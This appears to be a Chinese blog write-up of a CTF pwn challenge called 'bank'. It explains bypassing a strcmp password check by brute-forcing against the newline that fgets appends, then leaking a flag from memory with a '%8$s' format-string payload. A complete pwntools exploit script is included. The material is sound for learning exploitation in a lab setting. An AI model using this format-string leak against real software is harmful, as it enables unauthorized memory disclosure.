第六届全国网络空间安全技术大赛 pwn bank

利用格式化字符串漏洞绕过strcmp检查
"本文介绍了一种利用格式化字符串漏洞的方法来绕过strcmp函数的检查,通过爆破密码并设置特定的输入,使得程序读取flag到栈中的chunk。实验中使用了x00字符来达到目的,但fgets的输入限制要求我们找到一种方式处理回车符。最终,通过设置第一个数字为回车的ASCII值,成功触发漏洞并输出flag。"

在这里插入图片描述保护还算正常
在这里插入图片描述
需要绕过strcmp的检查

然后下面会把flag读到一个chunk中,地址在栈里面,我们可以通过格式化字符串来将它输出。

可以试一下地址的偏移是8,重点是上面怎么去绕过strcmp。
很简单的,我们可以通过’\x00’
但是问题是这道题输入是fgets,输入的时候必带回车,我们不能单输一个’\x00’,必然会有回车,所以我们只能是去爆破,password第一个数字等于我们的回车,就可以进入利用。

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"

elf = ELF("./bank")
libc = ELF("./64/libc-2.23.so")

def exp():
    r = process("./bank")

    r.sendlineafter("Please enter your account:\n", "aa")
    r.sendlineafter("Please enter your password:\n","")
    if 'wrong' in r.recvline():
        r.close()
        return
    #r.sendline("yes")
    r.sendlineafter("Do you want to check your account balance?\n", "yes")
    r.sendlineafter("Please input your private code: \n", "%8$s")
    r.interactive()

while 1:
    exp()

评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值